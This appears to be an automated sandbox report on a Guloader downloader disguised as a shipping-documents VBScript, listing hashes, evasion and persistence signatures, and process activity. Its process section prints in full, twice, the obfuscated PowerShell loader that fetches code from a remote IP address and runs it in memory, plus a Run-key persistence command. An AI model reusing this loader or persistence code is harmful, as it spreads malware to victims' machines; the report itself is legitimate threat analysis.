Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2023, 10:25
Static task
static1
Behavioral task
behavioral1
Sample
SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs
Resource
win10-20230703-en
Behavioral task
behavioral2
Sample
SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs
Resource
win10v2004-20230703-en
General
-
Target
SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs
-
Size
5KB
-
MD5
0bbe430413435af44cd3af7dd542d158
-
SHA1
b17fef7aa7714e8324d48750ebd21aa826d9f60c
-
SHA256
d6d6d837cf218e5f89c6eb733437a7a9f8fc74e43545409fd487c16d83808bed
-
SHA512
55c17fae57b17d46f50edcbbb176e484056cf629e7585eb3fa7db0263f0cbfab76d653d0589e7b0891abbfaf919438b17f30e25cbfa832491009445ca3c2437b
-
SSDEEP
96:bDW4xFZiEBpDD/tIPLC0kn5afwKFdKuFf3Tr/wL7Bb+cXfU49U5BAPA0p4:bjx/13DtIPLb6KfFfH/gw5CXy
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ielowutil.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Windows\CurrentVersion\Run ielowutil.exe Set value (str) \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Content = "%GULOM% -w 1 $Apenn=(Get-ItemProperty -Path 'HKCU:\\Gulv\\').Undlad;%GULOM% ($Apenn)" ielowutil.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 4820 ielowutil.exe 4820 ielowutil.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4956 powershell.exe 4820 ielowutil.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4956 set thread context of 4820 4956 powershell.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2776 powershell.exe 2776 powershell.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4820 ielowutil.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4848 wrote to memory of 2776 4848 WScript.exe 84 PID 4848 wrote to memory of 2776 4848 WScript.exe 84 PID 2776 wrote to memory of 4956 2776 powershell.exe 87 PID 2776 wrote to memory of 4956 2776 powershell.exe 87 PID 2776 wrote to memory of 4956 2776 powershell.exe 87 PID 4956 wrote to memory of 4820 4956 powershell.exe 99 PID 4956 wrote to memory of 4820 4956 powershell.exe 99 PID 4956 wrote to memory of 4820 4956 powershell.exe 99 PID 4956 wrote to memory of 4820 4956 powershell.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4820
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
184B
MD5c31c90b368eaf2eeec25578eb277f912
SHA1196375cfc1624d529c3a23cec4f8e4e0aade38c6
SHA256a5e3e263f9ad5c99e8c70987f966d0b05b18e8c227f92dafd0d131e79ac10678
SHA512723fc1b86a2a1d463795e999faedb67783b603b67ee053120d6dff4b4502aa4314be7e5735c226793ab6bed24771383f3342494f9aa079ec8a4f8f5fe170bd91
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82